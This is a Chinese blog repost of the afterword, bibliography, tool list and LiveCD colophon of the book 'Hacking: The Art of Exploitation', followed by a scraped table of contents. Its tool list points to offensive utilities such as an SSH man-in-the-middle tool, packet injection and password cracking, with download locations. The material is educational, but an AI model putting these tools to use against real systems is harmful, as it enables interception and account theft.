有些人可能会争论，如果没有黑客，就没有修复这些未发现漏洞的理由。这是一个观点，但就我个人而言，我更喜欢进步而不是停滞。黑客在技术的共同进化中扮演着非常重要的角色。没有黑客，就没有理由让计算机安全得到改善。此外，只要人们问“为什么？”和“如果……会怎样？”的问题，黑客就会一直存在。一个没有黑客的世界将是一个没有好奇心和创新的世界。

希望这本书已经解释了一些基本的黑客技术，也许甚至还有其精神。技术总是在变化和扩展，所以总会出现新的黑客技术。软件中总会存在新的漏洞，协议规范中的模糊性，以及无数其他的疏忽。从这本书中获得的知识只是一个起点。如何在此基础上扩展，不断弄清楚事物的工作原理，思考可能性，以及考虑开发者没有考虑到的方面，这取决于你。如何将这些发现发挥到极致，以及如何应用这些知识，这取决于你。信息本身并不是犯罪。

参考文献

Aleph1. "为了乐趣和利益而砸栈。" Phrack，第 49 期，在线发布于 www.phrack.org/issues.html?issue=49&id=14#article

Bennett, C.，F. Bessette，和 G. Brassard。 "实验性量子密码学。" Journal of Cryptology，第 5 卷，第 1 期（1992 年），3–28。

Borisov, N.，I. Goldberg，和 D. Wagner。 "WEP 算法的安全性。"在线发布于 www.isaac.cs.berkeley.edu/isaac/wep-faq.html

Brassard, G. 和 P. Bratley。 算法基础。 Englewood Cliffs, NJ：Prentice Hall，1995。

CNET 新闻。 "40 位加密证明无问题。"在线发布于 [www.news.com/News/Item/0,4,7483,00.html]( http://www.news.com/News/Item/0 ,4,7483,00.html)

Conover, M. (Shok)。 "w00w00 关于堆溢出。"在线发布于 www.w00w00.org/files/articles/heaptut.txt

电子前沿基金会。 "Felten vs. RIAA。"在线发布于 www.eff.org/IP/DMCA/Felten_v_RIAA

Eller, R. (caezar). "绕过英特尔平台上的 MSB 数据过滤器以进行缓冲区溢出攻击。"在线发布于 community.core-sdi.com/~juliano/bypass-msb.txt

Fluhrer, S.，I. Mantin，和 A. Shamir。 "RC4 密钥调度算法的弱点。"在线发布于 citeseer.ist.psu.edu/fluhrer01weaknesses.html

Grover, L. "量子力学有助于在稻草堆里寻找针。" Physical Review Letters，第 79 卷，第 2 期（1997 年），325–28。

Joncheray, L. "针对 TCP 的简单主动攻击。"在线发布于 www.insecure.org/stf/iphijack.txt

Levy, S. 黑客：计算机革命的英雄. 纽约：Doubleday，1984。

McCullagh, D. "俄罗斯 Adobe 黑客被捕"，Wired News，2001 年 7 月 17 日。在线发布于 [www.wired.com/news/politics/0,1283,45298,00.html]( http://www.wired.com/news/politics/0 ,1283,45298,00.html)

NASM 开发团队。 "NASM—网络汇编器（手册）"，版本 0.98.34。在线发布于nasm.sourceforge.net

Rieck, K. "模糊指纹：攻击人类大脑中的漏洞。"在线发布于freeworld.thc.org/papers/ffp.pdf

Schneier, B. 《应用密码学：协议、算法和 C 源代码》，第 2 版。纽约：John Wiley & Sons，1996 年。

Scut 和 Team Teso. "利用格式字符串漏洞"，版本 1.2。可在私人用户网站上找到。

Shor, P. "量子计算机上的素数分解和离散对数的多项式时间算法。" 《SIAM 计算机杂志》，第 26 卷（1997 年），1484–509 页。在线发布于www.arxiv.org/abs/quant-ph/9508027

Smith, N. "UNIX 操作系统中的堆栈溢出漏洞。"可在私人用户网站上找到。

Solar Designer. "绕过不可执行堆栈（及修复）。" 《BugTraq》帖子，1997 年 8 月 10 日。

Stinson, D. 《密码学：理论与实际》。佛罗里达州博卡拉顿：CRC 出版社，1995 年。

Zwicky, E., S. Cooper, and D. Chapman. 《构建互联网防火墙》，第 2 版。加利福尼亚州塞巴斯蒂波尔：O'Reilly，2000 年。

来源

pcalc

来自彼得·格林的程序员的计算器

`ibiblio.org/pub/Linux/apps/math/calc/pcalc-000.tar.gz`

NASM

来自 NASM 开发组的 Netwide Assembler

`nasm.sourceforge.net`

Nemesis

来自 obecian（马克·格里姆斯）和杰夫·内森特的命令行数据包注入工具

`www.packetfactory.net/projects/nemesis`

dsniff

来自 Dug Song 的网络嗅探工具集合

`monkey.org/~dugsong/dsniff`

Dissembler

来自 Matrix（约瑟夫·罗尼克）的可打印 ASCII 字节码多态器

`www.phiral.com`

mitm-ssh

克莱斯·尼伯格的 SSH 中间人攻击工具

`www.signedness.org/tools/mitm-ssh.tgz`

ffp

来自康拉德·里克的模糊指纹生成工具

`freeworld.thc.org/thc-ffp`

John the Ripper

来自 Solar Designer 的密码破解工具

`www.openwall.com/john`

扉页

可启动的 LiveCD 提供了一个基于 Linux 的渗透环境，该环境预先配置了编程、调试、操作网络流量和破解加密等功能。它包含了书中使用的所有源代码和应用软件。渗透是关于发现和创新，有了这个 LiveCD，你可以立即跟随书中的示例，并自行探索。

LiveCD 可以在大多数常见的个人电脑上使用，无需安装新的操作系统或修改电脑的当前设置。系统要求是至少拥有 64MB 系统内存的基于x86 的 PC，以及配置为从 CD-ROM 启动的 BIOS。

posted @ 2025-11-28 09:41 绝不原创的飞龙阅读(41) 评论(0) 收藏举报

刷新页面返回顶部

龙哥盟

掠夺·扩张·投机·博弈

黑客之利用的艺术第二版-全-

黑客之利用的艺术第二版（全）

前言

第 0x100 章。 引言

第 0x200 章。 编程

什么是编程？

Pseudo-code

控制结构

If-Then-Else

While/Until Loops

For 循环

更基本的编程概念

变量

| 算术运算符 |

比较运算符

函数

摸索实践

摸索实践

firstprog.c

整体图景

x86 处理器

汇编语言

ASCII 表

回归基础

字符串

char_array.c

char_array2.c

签名，未签名，长整型和短整型

datatype_sizes.c

指针

pointer.c

addressof.c

addressof2.c

格式字符串

fmt_strings.c

input.c

类型转换

typecasting.c

pointer_types.c

pointer_types2.c

pointer_types3.c

pointer_types4.c

pointer_types5.c

命令行参数

commandline.c

convert.c

convert2.c

变量作用域

scope.c

scope2.c

scope3.c

static.c

static2.c

内存分段

内存分段

stack_example.c

C 语言中的内存段

memory_segments.c

使用堆

heap_example.c

带错误检查的 malloc()

errorchecked_heap.c

建立在基础之上

文件访问

simplenote.c

bitwise.c

fcntl_flags.c

文件权限

用户 ID

uid_demo.c

hacking.h

notetaker.c

notesearch.c

结构体

time_example.c

time_example2.c

函数指针

funcptr_example.c

第 0x100 章。引言

第 0x200 章。编程

`input.c`

`typecasting.c`

`pointer_types.c`

`auth_overflow2.c`

`getenv_example.c`

来自`game_of_chance.c`

从`/usr/include/bits/socket.h`

从`/usr/include/bits/socket.h`

从`/usr/include/bits/socket.h`

从`/usr/include/bits/socket.h`